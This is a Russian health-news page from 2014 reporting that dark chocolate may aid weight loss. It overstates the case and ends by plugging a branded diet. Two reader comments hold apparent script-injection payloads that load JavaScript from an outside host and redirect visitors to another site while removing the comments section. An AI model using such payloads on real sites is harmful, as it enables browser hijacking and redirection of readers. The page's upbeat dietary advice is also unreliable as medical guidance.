Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Шоколад – панацея для худ...  >>  Шоколад – панацея для худеющих?
 
Обратная связь
 

Шоколад – панацея для худеющих?

Размер шрифта
28 мая 2014 00:00
Юрий Малышев
Здоровье инфо
Александр Чистяков
Здоровье инфо
  • google_analytics: false
  • Нравится

Что приходит на ум при мысли о еде для снижения веса? Сельдерей, куриные грудки, рыба, обезжиренный творог – но едва ли шоколад, согласитесь? А меж тем, ученые обнаружили, что этот продукт может стать весьма полезным в борьбе с лишним весом.

Шоколад – панацея для худеющих?

Авторы назвали свое исследование красноречиво: «Темный шоколад: парадокс ожирения, или смертельный враг лишнего веса?» Исследование проводилось в стенах Университета Королевы Маргарет (Масселборо, Шотландия). Ученые изучали влияние шоколада на лабораторных животных, людях и культуре клеток. Они обнаружили, что потребление какао или темного шоколада помогает бороться с лишним весом несколькими путями. Во-первых, происходит снижение продукции белков, участвующих в аномальном синтезе жира. Во-вторых, шоколад снижает всасывание жиров и углеводов в пищеварительном тракте. Наконец, в-третьих, съеденная шоколадка дарит нам ощущения сытости, что снижает вероятность внеплановой экспансии на территорию холодильника.

Аналогичное исследование проводилось также в отделении неврологии Римского университета Тор Вергата (Италия). Ученые работали с женщинами, которые выглядели здоровыми с точки зрения массы тела, но при этом у них было диагностировано ожирение. Это так называемый синдром «ожирения при нормальном весе». Как такое возможно? Дело в том, что у таких людей повышен процент содержания жировой ткани, что приводит к росту кардиологических рисков.

Авторы обнаружили, что темный шоколад может быть полезен для здоровья сердца, поскольку он снижает уровень холестерина и веществ, способствующих развитию воспаления. Кроме того, ученые выявили заметное снижение объема внутрибрюшного жира.

В обоих исследованиях использовался темный шоколад, которым по определению считается продукт с высоким содержанием какао и низким (вплоть до нуля) – сахара.

Стоит отметить, что в ряде предыдущих исследований было продемонстрировано позитивное влияние темного шоколада на повышенное артериальное давление.

В общем, смело включайте шоколад в список диетических продуктов! Это как раз тот самый случай, когда вкусная еда оказывается действительно полезной.

К слову, «Диета Елена Малышевой» целиком составлена по этому принципу – вкусно, полезно и всегда у вас под рукой.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - pomk93

06 июня 2014 в 09:48

Комментарий удален за нарушение Правил общения

2 - eva130870

15 июня 2014 в 18:51

Цитировать   |   Пожаловаться

сколько можно съесть шоколада, если сидишь на диете?

3 - zzzzzz

30 июня 2015 в 18:39

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

4 - zzzzzz

30 июня 2015 в 22:36

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Как есть, что угодно, и не переживать?   Ученые говорят: откажитесь от лишнего веса, но не от картошки!   Как измерить свое тело, чтобы похудеть   Перекус, который уменьшит размер штанов  
21 мая 2013Когда я ем – я глух и нем! Ученые доказали, что это поможет похудеть! 11 октября 2013Елена Малышева расскажет все о том, как правильно худеть
 
05 июля 2013Вы не виноваты в своем лишнем весе! Еда всего лишь одна из причин ожирения! Какая же главная? 31 мая 2013От инфаркта не убежать, но можно уйти! Новые данные говорят о том, что ходьба также эффективна, как бег, в борьбе с лишним весом!
 

Слайдшоу

1
Супереда для быстрого похудения
Как контролировать свои соблазны и похудеть?
Как похудеть быстрее подруги?

Тесты

1
Правильно ли вы худеете?
Какое мороженное съесть, чтобы похудеть
Есть ли у вас избыточный вес?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.